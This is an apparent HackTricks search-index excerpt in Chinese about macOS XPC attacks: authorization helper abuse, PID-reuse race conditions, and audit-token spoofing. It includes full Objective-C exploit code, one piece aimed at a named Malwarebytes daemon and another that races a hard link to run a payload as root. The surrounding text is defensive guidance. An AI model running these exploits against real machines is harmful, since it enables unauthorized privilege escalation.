kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, &authReference);\\nconst char* errorMsg = CFStringGetCStringPtr(SecCopyErrorMessageString(status, nil), kCFStringEncodingMacRoman);\\nNSLog(@\\"OSStatus: %s\\", errorMsg); // Convert the authorization reference to an external form\\nif (status == errAuthorizationSuccess) {\\nstatus = AuthorizationMakeExternalForm(authReference, &authForm);\\nerrorMsg = 
CFStringGetCStringPtr(SecCopyErrorMessageString(status, nil), kCFStringEncodingMacRoman);\\nNSLog(@\\"OSStatus: %s\\", errorMsg);\\n} // Convert the external form to NSData for transmission\\nif (status == errAuthorizationSuccess) {\\nauthData = [[NSData alloc] initWithBytes:&authForm length:sizeof(authForm)];\\nerrorMsg = CFStringGetCStringPtr(SecCopyErrorMessageString(status, nil), kCFStringEncodingMacRoman);\\nNSLog(@\\"OSStatus: %s\\", errorMsg);\\n} // Ensure the authorization was successful\\nassert(status == errAuthorizationSuccess); // Establish an XPC connection\\nNSString *serviceName = XPCServiceName;\\nNSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:serviceName options:0x1000];\\nNSXPCInterface *xpcInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCHelperProtocol)];\\n[xpcConnection setRemoteObjectInterface:xpcInterface];\\n[xpcConnection resume]; // Handle errors for the XPC connection\\nid remoteProxy = [xpcConnection remoteObjectProxyWithErrorHandler:^(NSError *error) {\\nNSLog(@\\"[-] Connection error\\");\\nNSLog(@\\"[-] Error: %@\\", error);\\n}]; // Log the remote proxy and connection objects\\nNSLog(@\\"Remote Proxy: %@\\", remoteProxy);\\nNSLog(@\\"XPC Connection: %@\\", xpcConnection); // Use the legacy method to configure the proxy\\n[remoteProxy legacyConfigureProxyWithAuthorization:authData enabled:isProxyEnabled host:proxyAddress port:proxyPort reply:^(NSError *error, BOOL success) {\\nNSLog(@\\"Response: %@\\", error);\\n}]; // Allow some time for the operation to complete\\n[NSThread sleepForTimeInterval:10.0f]; NSLog(@\\"Finished!\\");\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 利用示例","id":"2453","title":"利用示例"},"2454":{"body":"https://blog.securelayer7.net/applied-endpointsecurity-framework-previlege-escalation/?utm_source=pocket_shared","breadcrumbs":"macOS Security & 
Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 其他被滥用的 XPC 权限助手","id":"2454","title":"其他被滥用的 XPC 权限助手"},"2455":{"body":"https://theevilbit.github.io/posts/secure_coding_xpc_part1/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 参考文献","id":"2455","title":"参考文献"},"2456":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS XPC 连接进程检查","id":"2456","title":"macOS XPC 连接进程检查"},"2457":{"body":"当与 XPC 服务建立连接时,服务器将检查该连接是否被允许。通常会执行以下检查: 检查连接的 进程是否使用 Apple 签名 的证书(仅由 Apple 发放)。 如果 未验证 ,攻击者可以创建一个 伪造证书 来匹配其他检查。 检查连接进程是否使用 组织的证书 (团队 ID 验证)。 如果 未验证 ,可以使用 任何开发者证书 从 Apple 进行签名,并连接到服务。 检查连接进程 是否包含正确的包 ID 。 如果 未验证 ,任何 由同一组织签名的工具 都可以用来与 XPC 服务交互。 (4 或 5) 检查连接进程是否具有 正确的软件版本号 。 如果 未验证 ,旧的、不安全的客户端,易受进程注入攻击,可以在其他检查到位的情况下连接到 XPC 服务。 (4 或 5) 检查连接进程是否具有没有危险权限的 强化运行时 (如允许加载任意库或使用 DYLD 环境变量的权限)。 如果 未验证 ,客户端可能 易受代码注入 攻击。 检查连接进程是否具有允许其连接到服务的 权限 。这适用于 Apple 二进制文件。 验证 必须 基于 连接 客户端的审计令牌 而不是 其进程 ID ( PID ),因为前者可以防止 PID 重用攻击 。 开发者 很少使用审计令牌 API 调用,因为它是 私有的 ,所以 Apple 可能会 随时更改 。此外,私有 API 的使用在 Mac App Store 应用中是不允许的。 如果使用 processIdentifier 方法,可能会存在漏洞。 应使用 xpc_dictionary_get_audit_token 而不是 xpc_connection_get_audit_token ,因为后者在某些情况下也可能 存在漏洞 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » XPC 连接进程检查","id":"2457","title":"XPC 连接进程检查"},"2458":{"body":"有关 PID 重用攻击的更多信息,请查看: macOS PID Reuse 有关 xpc_connection_get_audit_token 攻击的更多信息,请查看: macOS xpc_connection_get_audit_token Attack","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » 通信攻击","id":"2458","title":"通信攻击"},"2459":{"body":"Trustcache 是一种防御方法,在 Apple Silicon 机器中引入,存储 Apple 二进制文件的 CDHash 数据库,以便仅允许未修改的二进制文件执行。这可以防止降级版本的执行。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » Trustcache - 降级攻击防范","id":"2459","title":"Trustcache - 降级攻击防范"},"246":{"body":"由于 initial NAS 缺乏完整性和新鲜度,捕获到的 
InitialUEMessage+Registration Request 可以被重放到 AMF。 PoC rule for 5GReplay to forward matching replays: xml \\n \\n \\n \\n What to observe: AMF 是否接受重放并继续 Authentication;缺乏新鲜性/上下文验证表明存在暴露。 Mitigations: 在 AMF 强制实施重放保护/上下文绑定;对每个 GNB/UE 进行速率限制和关联检测。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 9.3 重放 initial Registration Request (pre-security NAS)","id":"246","title":"9.3 重放 initial Registration Request (pre-security NAS)"},"2460":{"body":"服务器将在名为 shouldAcceptNewConnection 的函数中实现此 验证 。 objectivec - (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection {\\n//Check connection\\nreturn YES;\\n} 对象 NSXPCConnection 有一个 private 属性 auditToken (应该使用但可能会更改)和一个 public 属性 processIdentifier (不应该使用)。 连接进程可以通过以下方式进行验证: objectivec [...]\\nSecRequirementRef requirementRef = NULL;\\nNSString requirementString = @\\"anchor apple generic and identifier \\\\\\"xyz.hacktricks.service\\\\\\" and certificate leaf [subject.CN] = \\\\\\"TEAMID\\\\\\" and info [CFBundleShortVersionString] >= \\\\\\"1.0\\\\\\"\\";\\n/* Check:\\n- Signed by a cert signed by Apple\\n- Check the bundle ID\\n- Check the TEAMID of the signing cert\\n- Check the version used\\n*/ // Check the requirements with the PID (vulnerable)\\nSecRequirementCreateWithString(requirementString, kSecCSDefaultFlags, &requirementRef);\\nSecCodeCheckValidity(code, kSecCSDefaultFlags, requirementRef); // Check the requirements using the auditToken (secure)\\nSecTaskRef taskRef = SecTaskCreateWithAuditToken(NULL, ((ExtendedNSXPCConnection*)newConnection).auditToken);\\nSecTaskValidateForRequirement(taskRef, (__bridge CFStringRef)(requirementString)) 如果开发者不想检查客户端的版本,他至少可以检查客户端是否不易受到进程注入的攻击: objectivec [...]\\nCFDictionaryRef csInfo = NULL;\\nSecCodeCopySigningInformation(code, kSecCSDynamicInformation, &csInfo);\\nuint32_t csFlags = [((__bridge NSDictionary *)csInfo)[(__bridge NSString *)kSecCodeInfoStatus] intValue];\\nconst uint32_t cs_hard = 0x100; // don\'t load 
invalid page.\\nconst uint32_t cs_kill = 0x200; // Kill process if page is invalid\\nconst uint32_t cs_restrict = 0x800; // Prevent debugging\\nconst uint32_t cs_require_lv = 0x2000; // Library Validation\\nconst uint32_t cs_runtime = 0x10000; // hardened runtime\\nif ((csFlags & (cs_hard | cs_require_lv)) {\\nreturn Yes; // Accept connection\\n} tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » 代码示例","id":"2460","title":"代码示例"},"2461":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS PID Reuse » macOS PID 重用","id":"2461","title":"macOS PID 重用"},"2462":{"body":"当 macOS XPC 服务 基于 PID 而不是 审计令牌 检查被调用的进程时,它容易受到 PID 重用攻击。此攻击基于 竞争条件 ,其中 利用 将 消息发送到 XPC 服务 滥用 功能,随后执行 posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ) 以使用 允许的 二进制文件。 此函数将使 允许的二进制文件拥有 PID ,但 恶意的 XPC 消息会在此之前发送 。因此,如果 XPC 服务 使用 PID 来 验证 发送者,并在执行 posix_spawn 之后检查它,它将认为消息来自 授权 进程。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS PID Reuse » PID 重用","id":"2462","title":"PID 重用"},"2463":{"body":"如果你找到函数 shouldAcceptNewConnection 或其调用的函数 调用 processIdentifier 而不调用 auditToken ,这很可能意味着它在 验证进程 PID 而不是审计令牌。 例如在这张图片中(取自参考): 查看这个示例利用(同样取自参考)以查看利用的两个部分: 一个 生成多个分叉 每个分叉 将 发送 有效载荷 到 XPC 服务,同时在发送消息后立即执行 posix_spawn 。 caution 为了使利用有效,重要的是 export`` `` OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES 或在利用中放入: asm(\\".section __DATA,__objc_fork_ok\\\\n\\"\\n\\"empty:\\\\n\\"\\n\\".no_dead_strip empty\\\\n\\"); NSTasks\\nfork 第一种选项使用 NSTasks 和参数来启动子进程以利用 RC objectivec // Code from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/\\n// gcc -framework Foundation expl.m -o expl #import \\n#include \\n#include #define RACE_COUNT 32\\n#define MACH_SERVICE @\\"com.malwarebytes.mbam.rtprotection.daemon\\"\\n#define BINARY \\"/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon\\" // allow fork() between exec()\\nasm(\\".section __DATA,__objc_fork_ok\\\\n\\"\\n\\"empty:\\\\n\\"\\n\\".no_dead_strip empty\\\\n\\"); extern char **environ; // defining necessary protocols\\n@protocol ProtectionService\\n- (void)startDatabaseUpdate;\\n- 
(void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1;\\n- (void)uninstallProduct;\\n- (void)installProductUpdate;\\n- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2;\\n- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1;\\n- (void)triggerLicenseRelatedChecks;\\n- (void)buildRenewalLinkWith:(NSUUID *)arg1 completion:(void (^)(long long, NSString *))arg2;\\n- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;\\n- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;\\n- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;\\n- (void)applyLicenseWith:(NSUUID *)arg1 key:(NSString *)arg2 completion:(void (^)(long long))arg3;\\n- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2;\\n- (void)restartOS;\\n- (void)resumeScanJob;\\n- (void)pauseScanJob;\\n- (void)stopScanJob;\\n- (void)startScanJob;\\n- (void)disposeOperationBy:(NSUUID *)arg1;\\n- (void)subscribeTo:(long long)arg1;\\n- (void)pingWithTag:(NSUUID *)arg1 completion:(void (^)(NSUUID *, long long))arg2;\\n@end void child() { // send the XPC messages\\nNSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)];\\nNSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged];\\nxpcConnection.remoteObjectInterface = remoteInterface; [xpcConnection resume];\\n[xpcConnection.remoteObjectProxy restartOS]; char target_binary[] = BINARY;\\nchar *target_argv[] = {target_binary, NULL};\\nposix_spawnattr_t attr;\\nposix_spawnattr_init(&attr);\\nshort flags;\\nposix_spawnattr_getflags(&attr, &flags);\\nflags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);\\nposix_spawnattr_setflags(&attr, flags);\\nposix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);\\n} bool create_nstasks() { NSString *exec = [[NSBundle mainBundle] 
executablePath];\\nNSTask *processes[RACE_COUNT]; for (int i = 0; i < RACE_COUNT; i++) {\\nprocesses[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @\\"imanstask\\" ]];\\n} int i = 0;\\nstruct timespec ts = {\\n.tv_sec = 0,\\n.tv_nsec = 500 * 1000000,\\n}; nanosleep(&ts, NULL);\\nif (++i > 4) {\\nfor (int i = 0; i < RACE_COUNT; i++) {\\n[processes[i] terminate];\\n}\\nreturn false;\\n} return true;\\n} int main(int argc, const char * argv[]) { if(argc > 1) {\\n// called from the NSTasks\\nchild(); } else {\\nNSLog(@\\"Starting the race\\");\\ncreate_nstasks();\\n} return 0;\\n} 这个例子使用原始 fork 来启动 将利用 PID 竞争条件的子进程 ,然后通过硬链接利用 另一个竞争条件: objectivec // export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES\\n// gcc -framework Foundation expl.m -o expl #include \\n#include \\n#include // TODO: CHANGE PROTOCOL AND FUNCTIONS\\n@protocol HelperProtocol\\n- (void)DoSomething:(void (^)(_Bool))arg1;\\n@end // Global flag to track exploitation status\\nbool pwned = false; /**\\n* Continuously overwrite the contents of the \'hard_link\' file in a race condition to make the\\n* XPC service verify the legit binary and then execute as root our payload.\\n*/\\nvoid *check_race(void *arg) {\\nwhile(!pwned) {\\n// Overwrite with contents of the legit binary\\nsystem(\\"cat ./legit_bin > hard_link\\");\\nusleep(50000); // Overwrite with contents of the payload to execute\\n// TODO: COMPILE YOUR OWN PAYLOAD BIN\\nsystem(\\"cat ./payload > hard_link\\");\\nusleep(50000);\\n}\\nreturn NULL;\\n} void child_xpc_pid_rc_abuse(){\\n// TODO: INDICATE A VALID BIN TO BYPASS SIGN VERIFICATION\\n#define kValid \\"./Legit Updater.app/Contents/MacOS/Legit\\"\\nextern char **environ; // Connect with XPC service\\n// TODO: CHANGE THE ID OF THE XPC TO EXPLOIT\\nNSString* service_name = @\\"com.example.Helper\\";\\nNSXPCConnection* connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];\\n// TODO: CHANGE THE PROTOCOL NAME\\nNSXPCInterface* interface = [NSXPCInterface 
interfaceWithProtocol:@protocol(HelperProtocol)];\\n[connection setRemoteObjectInterface:interface];\\n[connection resume]; id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError* error) {\\nNSLog(@\\"[-] Something went wrong\\");\\nNSLog(@\\"[-] Error: %@\\", error);\\n}]; NSLog(@\\"obj: %@\\", obj);\\nNSLog(@\\"conn: %@\\", connection); // Call vulnerable XPC function\\n// TODO: CHANGE NAME OF FUNCTION TO CALL\\n[obj DoSomething:^(_Bool b){\\nNSLog(@\\"Response, %hdd\\", b);\\n}]; // Change current process to the legit binary suspended\\nchar target_binary[] = kValid;\\nchar *target_argv[] = {target_binary, NULL};\\nposix_spawnattr_t attr;\\nposix_spawnattr_init(&attr);\\nshort flags;\\nposix_spawnattr_getflags(&attr, &flags);\\nflags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);\\nposix_spawnattr_setflags(&attr, flags);\\nposix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);\\n} /**\\n* Function to perform the PID race condition using children calling the XPC exploit.\\n*/\\nvoid xpc_pid_rc_abuse() {\\n#define RACE_COUNT 1\\nextern char **environ;\\nint pids[RACE_COUNT]; // Fork child processes to exploit\\nfor (int i = 0; i < RACE_COUNT; i++) {\\nint pid = fork();\\nif (pid == 0) { // If a child process\\nchild_xpc_pid_rc_abuse();\\n}\\nprintf(\\"forked %d\\\\n\\", pid);\\npids[i] = pid;\\n} // Wait for children to finish their tasks\\nsleep(3); // Terminate child processes\\nfor (int i = 0; i < RACE_COUNT; i++) {\\nif (pids[i]) {\\nkill(pids[i], 9);\\n}\\n}\\n} int main(int argc, const char * argv[]) {\\n// Create and set execution rights to \'hard_link\' file\\nsystem(\\"touch hard_link\\");\\nsystem(\\"chmod +x hard_link\\"); // Create thread to exploit sign verification RC\\npthread_t thread;\\npthread_create(&thread, NULL, check_race, NULL); while(!pwned) {\\n// Try creating \'download\' directory, ignore errors\\nsystem(\\"mkdir download 2>/dev/null\\"); // Create a hardlink\\n// TODO: CHANGE NAME OF FILE FOR SIGN VERIF 
RC\\nsystem(\\"ln hard_link download/legit_bin\\"); xpc_pid_rc_abuse();\\nusleep(10000); // The payload will generate this file if exploitation is successfull\\nif (access(\\"/tmp/pwned\\", F_OK ) == 0) {\\npwned = true;\\n}\\n} return 0;\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS PID Reuse » 利用示例","id":"2463","title":"利用示例"},"2464":{"body":"https://gergelykalman.com/why-you-shouldnt-use-a-commercial-vpn-amateur-hour-with-windscribe.html","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS PID Reuse » 其他示例","id":"2464","title":"其他示例"},"2465":{"body":"https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/ https://saelo.github.io/presentations/warcon18_dont_trust_the_pid.pdf tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS PID Reuse » 参考文献","id":"2465","title":"参考文献"},"2466":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 有关更多信息,请查看原始帖子: https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/ 。这是一个总结:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » macOS xpc_connection_get_audit_token 攻击","id":"2466","title":"macOS xpc_connection_get_audit_token 攻击"},"2467":{"body":"如果你不知道 Mach 消息是什么,请开始查看这个页面: macOS IPC - Inter Process Communication 目前请记住( 此处定义 ): Mach 消息通过 mach 端口 发送,这是一个内置于 mach 内核的 单接收者,多发送者通信 通道。 多个进程可以向 mach 端口发送消息 ,但在任何时候 只有一个进程可以从中读取 。就像文件描述符和套接字一样,mach 端口由内核分配和管理,进程只看到一个整数,可以用来指示内核它们想使用哪个 mach 端口。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » Mach 消息基本信息","id":"2467","title":"Mach 消息基本信息"},"2468":{"body":"如果你不知道如何建立 XPC 连接,请查看: macOS XPC","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » XPC 连接","id":"2468","title":"XPC 连接"},"2469":{"body":"你需要知道的是 XPC 的抽象是一个一对一的连接 ,但它基于一种 可以有多个发送者的技术,因此: Mach 端口是单接收者, 多个发送者 。 XPC 连接的审计令牌是 从最近接收到的消息中复制的审计令牌 。 获取 XPC 连接的 审计令牌 对许多 安全检查 至关重要。 尽管前面的情况听起来很有前景,但在某些场景中这不会造成问题( 来自这里 ): 审计令牌通常用于授权检查,以决定是否接受连接。由于这是通过向服务端口发送消息进行的,因此 尚未建立连接 。在此端口上的更多消息将被视为额外的连接请求。因此,任何 在接受连接之前的检查都不易受攻击 (这也意味着在 -listener:shouldAcceptNewConnection: 中审计令牌是安全的)。因此,我们 正在寻找验证特定操作的 XPC 连接 。 XPC 事件处理程序是同步处理的。这意味着一个消息的事件处理程序必须在调用下一个之前完成,即使在并发调度队列中。因此,在 XPC 事件处理程序中,审计令牌不能被其他正常(非回复!)消息覆盖 。 这可能被利用的两种不同方法: 变体1: 利用 连接 到服务 A 和服务 B 服务 B 可以调用服务 A 中用户无法调用的 特权功能 服务 A 在 dispatch_async 中的连接 事件处理程序 外部 调用 xpc_connection_get_audit_token 。 因此, 不同 的消息可能会 覆盖审计令牌 ,因为它是在事件处理程序外部异步调度的。 利用将 发送 权限传递给 服务 B 的服务 A 。 因此,服务 B 实际上将 发送 消息到服务 A 。 利用 
尝试 调用 特权操作 。在 RC 服务 A 检查 此 操作 的授权时, 服务 B 覆盖了审计令牌 (使利用能够调用特权操作)。 变体 2: 服务 B 可以调用服务 A 中用户无法调用的 特权功能 利用与 服务 A 连接, 发送 利用一个 期望回复 的消息到特定的 回复 端口 。 利用向 服务 B 发送一条消息,传递 该回复端口 。 当服务 B 回复 时,它 将消息发送到服务 A , 同时 利用向服务 A 发送不同的 消息 ,试图 达到特权功能 ,并期望服务 B 的回复会在完美的时刻覆盖审计令牌(竞争条件)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » 漏洞总结","id":"2469","title":"漏洞总结"},"247":{"body":"Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS. Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration. 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule. Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences.","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 9.4 Tooling pointers (reproducible)","id":"247","title":"9.4 Tooling pointers (reproducible)"},"2470":{"body":"场景: 两个 mach 服务 A 和 B ,我们都可以连接到(基于沙箱配置文件和接受连接之前的授权检查)。 A 必须对 B 可以传递的特定操作进行 授权检查 (但我们的应用程序不能)。 例如,如果 B 拥有某些 权限 或以 root 身份运行,它可能允许他请求 A 执行特权操作。 对于此授权检查, A 异步获取审计令牌,例如通过从 dispatch_async 调用 xpc_connection_get_audit_token。 caution 在这种情况下,攻击者可以触发 竞争条件 ,使 利用 多次请求 A 执行操作 ,同时使 B 向 A 发送消息 。当 RC 成功 时, B 的 审计令牌 将在 我们的利用 的请求被 处理 时复制到内存中,从而使其 访问只有 B 可以请求的特权操作 。 这发生在 A 作为 smd 和 B 作为 diagnosticd。函数 SMJobBless 可以用于安装新的特权辅助工具(作为 root )。如果 以 root 身份运行的进程联系 smd ,将不会执行其他检查。 因此,服务 B 是 diagnosticd ,因为它以 root 身份运行并可用于 监控 进程,因此一旦监控开始,它将 每秒发送多条消息 。 进行攻击的步骤: 使用标准 XPC 协议初始化与名为 smd 的服务的 连接 。 形成与 diagnosticd 的二次 连接 。与正常程序相反,而不是创建并发送两个新的 mach 端口,客户端端口发送权限被替换为与 smd 连接相关联的 发送权限 的副本。 结果,XPC 消息可以调度到 diagnosticd,但来自 diagnosticd 的响应被重定向到 smd。对 smd 来说,来自用户和 diagnosticd 的消息似乎来自同一连接。 描述利用过程的图像 下一步是指示 diagnosticd 启动对所选进程(可能是用户自己的进程)的监控。同时,向 smd 发送大量常规 1004 消息。此操作的目的是安装具有提升权限的工具。 此操作触发 handle_bless 函数中的竞争条件。时机至关重要:xpc_connection_get_pid 函数调用必须返回用户进程的 
PID(因为特权工具位于用户的应用程序包中)。然而,xpc_connection_get_audit_token 函数,特别是在 connection_is_authorized 子例程中,必须引用属于 diagnosticd 的审计令牌。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » 变体 1:在事件处理程序外部调用 xpc_connection_get_audit_token","id":"2470","title":"变体 1:在事件处理程序外部调用 xpc_connection_get_audit_token"},"2471":{"body":"在 XPC(跨进程通信)环境中,尽管事件处理程序不会并发执行,但回复消息的处理具有独特的行为。具体而言,存在两种不同的方法来发送期望回复的消息: xpc_connection_send_message_with_reply :在这里,XPC 消息在指定队列上接收和处理。 xpc_connection_send_message_with_reply_sync :相反,在此方法中,XPC 消息在当前调度队列上接收和处理。 这种区别至关重要,因为它允许 回复数据包与 XPC 事件处理程序的执行并发解析 。值得注意的是,虽然 _xpc_connection_set_creds 确实实现了锁定以防止审计令牌的部分覆盖,但它并未将此保护扩展到整个连接对象。因此,这造成了一个漏洞,在解析数据包和执行其事件处理程序之间的间隔中,审计令牌可能会被替换。 要利用此漏洞,需要以下设置: 两个 mach 服务,称为 A 和 B ,都可以建立连接。 服务 A 应该对只有 B 可以执行的特定操作进行授权检查(用户的应用程序无法)。 服务 A 应该发送一条期望回复的消息。 用户可以向 B 发送一条消息, B 将对此进行回复。 利用过程涉及以下步骤: 等待服务 A 发送一条期望回复的消息。 不直接回复 A ,而是劫持回复端口并用于向服务 B 发送消息。 随后,发送涉及禁止操作的消息,期望它与来自 B 的回复并发处理。 以下是所描述攻击场景的可视化表示: ![https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/variant2.png](../../../../../../images/image (1) (1) (1) (1) (1) (1) (1).png)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » 变体 2:回复转发","id":"2471","title":"变体 2:回复转发"},"2472":{"body":"定位实例的困难 :静态和动态搜索 xpc_connection_get_audit_token 使用实例都很具挑战性。 方法论 :使用 Frida 钩住 xpc_connection_get_audit_token 函数,过滤不来自事件处理程序的调用。然而,这种方法仅限于被钩住的进程,并且需要主动使用。 分析工具 :使用 IDA/Ghidra 等工具检查可达的 mach 服务,但该过程耗时,且由于涉及 dyld 共享缓存的调用而复杂。 脚本限制 :尝试为从 dispatch_async 块调用 xpc_connection_get_audit_token 的分析编写脚本时,由于解析块和与 dyld 共享缓存的交互的复杂性而受到阻碍。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process 
